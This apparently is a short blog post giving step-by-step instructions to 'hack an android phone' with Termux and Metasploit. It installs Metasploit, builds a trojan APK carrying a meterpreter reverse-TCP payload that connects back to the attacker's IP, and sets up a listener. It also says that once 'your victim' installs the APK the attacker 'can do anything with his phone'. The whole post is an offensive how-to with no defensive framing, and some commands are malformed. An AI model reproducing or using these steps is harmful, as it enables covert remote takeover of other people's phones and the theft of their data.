To hack an andriod phone :--
STEP 1. Download Termux from play store
STEP 2.Open termux app
STEP 3.Apply command termux-setup-storage and allow premission
STEP 4.Insert command pkg install update && upgrade
STEP 5.pkg install git
STEP 6. git clone https://github.com/rapid7/metasploit-framework.git
After installationis finished simply put the command
msfvenom -p android/meterpreter/reverse_tcp/LHOST="your ip address" LPORT="4444" R > /sdcard/xyz.apk
to find your ip just simply open a new session and write ifconfig
and another new session and write msfconsole
After starting the msfconsole
just follow the commands
1.use exploit/multi/handler
2.set payload android/meterpreter/reverse_tcp
3.set lhost enter ip address without double quotes
4.set lport 4444
5.run
when your victim install your apk you will get the session and you can do anything with his phone but this is only for local area network..
0 Comments